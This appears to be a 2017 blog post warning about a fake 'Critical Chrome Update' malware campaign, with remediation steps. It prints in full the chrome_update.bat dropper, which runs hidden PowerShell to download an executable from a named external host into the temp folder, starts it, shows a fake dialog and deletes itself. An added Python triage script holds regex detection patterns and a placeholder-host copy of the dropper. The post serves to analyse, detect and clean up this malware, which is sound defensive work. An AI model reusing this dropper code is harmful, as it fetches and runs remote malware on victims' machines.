Friday, May 12, 2017

How to fix the Critical Chrome Update Virus Malware Attack

The "Critical Chrome Update" malware campaign has been going around and getting past many antivirus solutions. Do not click the "Download now" button.



What does this do? A brief analysis

The "Download now" button downloads a file named chrome_update.bat, which does the following:
  1. The batch script writes out a script file and uses it to run a hidden PowerShell command that downloads a .dat file and saves it under a randomly named .exe file name in the temp folder.
  2. It then runs that .exe in the background, which attempts to inject script into currently running processes.
  3. You are then shown an "Update complete." notification with an OK button to dismiss it.
  4. By clicking OK, you are installing install_flash.js, which contains VBScript.
wscript.exe is the Windows component that executes VBScript files; in this case it runs install_flash.js.

chrome_update.bat contents
@echo off
echo a=new ActiveXObject('Wscript.Shell');
a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\16330788701ac441736751e3ee3c6996.exe';
(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);
Start-Process $d;
[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');
[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)",0,false);
>"%temp%\install_flash.js"
start /min "" wscript.exe "%temp%\install_flash.js"
DEL "%~f0"


Full analysis of the chrome_update.bat payload at Payload Security.

More information about install_flash.js at Payload Security.
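As an added example (not code from the original post), here is a small Python triage script that checks the text of a .bat/.js file for the chain described above: WScript.Shell launching a hidden PowerShell download into the temp folder, starting the downloaded file, the fake "Update complete." dialog, a wscript.exe launch from %temp%, and self-deletion. It scores the hits and pulls out the URL and temp-folder paths as indicators. Both sample scripts are constructed for the example: the first mirrors the structure of chrome_update.bat with a placeholder domain (updates.invalid) and a placeholder file name, the second is a harmless backup batch file, so you can see the threshold separate them.

```python
"""Static triage of a dropper script for the behaviours described above.

Added example, not code from the original post. It scans the text of a
.bat/.js file for the chain the fake Chrome update uses (WScript.Shell ->
hidden PowerShell -> download to %TEMP% -> run -> fake dialog -> self-delete)
and reports a score plus the IOCs it can extract. Sample scripts and the
URL/file names in them are constructed placeholders.
"""
import re
from dataclasses import dataclass, field

# Behaviour indicators: (name, regex, weight). Weighted so that a single
# benign hit (e.g. a MessageBox in a legitimate installer) stays below threshold.
INDICATORS = [
    ("wscript_shell", r"ActiveXObject\(\s*['\"]WScript\.Shell['\"]\s*\)", 2),
    ("hidden_powershell", r"powershell\b[^\n]*-WindowStyle\s+Hidden", 3),
    ("web_download", r"\.DownloadFile\(|\.DownloadString\(|Invoke-WebRequest", 3),
    ("exe_in_temp", r"(?:\$env:temp|%temp%)[^\n]*?\.exe\b", 2),
    ("start_variable", r"Start-Process\s+\$\w+", 2),
    ("wscript_launch", r"\bwscript(?:\.exe)?\s+\"?%temp%", 2),
    ("self_delete", r"\bdel\s+\"?%~f0", 2),
    ("fake_dialog", r"messagebox\]::show\(", 1),
]
COMPILED = [(n, re.compile(rx, re.I), w) for n, rx, w in INDICATORS]

URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)
# Both spellings of the temp directory: PowerShell's $env:temp+'...' and cmd's %temp%...
TEMP_PATH_RE = re.compile(r"\$env:temp\s*\+\s*'([^']+)'|%temp%([^\s'\"]+)", re.I)


@dataclass
class TriageResult:
    matched: list = field(default_factory=list)
    score: int = 0
    urls: list = field(default_factory=list)
    temp_paths: list = field(default_factory=list)
    verdict: str = "no-dropper-pattern"


def triage(script_text: str, threshold: int = 6) -> TriageResult:
    """Score one script and pull out its network and file-system IOCs."""
    r = TriageResult()
    for name, rx, weight in COMPILED:
        if rx.search(script_text):
            r.matched.append(name)
            r.score += weight
    r.urls = sorted(set(URL_RE.findall(script_text)))
    for ps_frag, cmd_frag in TEMP_PATH_RE.findall(script_text):
        frag = (ps_frag or cmd_frag).lstrip("\\")
        r.temp_paths.append("%TEMP%\\" + frag)
    r.temp_paths = sorted(set(r.temp_paths))
    if r.score >= threshold:
        r.verdict = "suspicious-dropper"
    return r


# Constructed sample mirroring the structure of chrome_update.bat (placeholder host/file).
SAMPLE_DROPPER = r"""@echo off
echo a=new ActiveXObject('Wscript.Shell');
a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\a1b2c3d4e5f6.exe';
(New-Object System.Net.WebClient).DownloadFile('https://updates.invalid/17/524.dat',$d);
Start-Process $d;
[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');
[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK,[System.Windows.Forms.MessageBoxIcon]::Information)",0,false);
>"%temp%\install_flash.js"
start /min "" wscript.exe "%temp%\install_flash.js"
DEL "%~f0"
"""

# Constructed harmless batch file, to show the threshold does not fire on ordinary scripts.
SAMPLE_BENIGN = r"""@echo off
echo Backing up documents...
xcopy "%USERPROFILE%\Documents" "D:\Backup\Documents" /E /I /Y
echo Done.
"""

if __name__ == "__main__":
    for label, text in (("dropper", SAMPLE_DROPPER), ("benign", SAMPLE_BENIGN)):
        res = triage(text)
        print(f"{label}: {res.verdict} (score {res.score}) matched={res.matched}")
        for u in res.urls:
            print("  url :", u)
        for p in res.temp_paths:
            print("  path:", p)
```

Run it as-is to see the two verdicts; for a real file, read a quarantined copy's contents and pass the text to triage(). The indicators are behavioural rather than a signature for one sample, so renamed files or a different download host still score, and the weights and threshold are illustrative starting points to tune against your own benign scripts.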


What to do if you did click the "Download Now" button?

  1. Run Bleeping Computer's Rkill. Do not reboot afterwards. Then run Malwarebytes AdwCleaner and reboot when asked.
  2. Run Bleeping Computer's Rkill again, then run Malwarebytes JRT in the same session.
  3. Run Malwarebytes.
  4. Run HitmanPro.
  5. Run Windows Defender on Windows 8 and later, or Windows Security Essentials on Windows 7 and earlier.
  6. Run the free Kaspersky Security Scan (get it here).
  7. Run the free Kaspersky Anti-Ransomware Tool (get it here).
  8. Run your antivirus solution in deep scan mode.
  9. Clear your Chrome cache. Open Chrome, then:
       1. On your browser toolbar, click the More menu.
       2. Point to More tools, and then click Clear browsing data.
       3. In the "Clear browsing data" box, tick only Cached images and files.
       4. Use the menu at the top to select how much data you want to delete. Choose "the beginning of time" to delete everything.
       5. Click the Clear browsing data button.
  10. Review your cookies in Google Chrome.


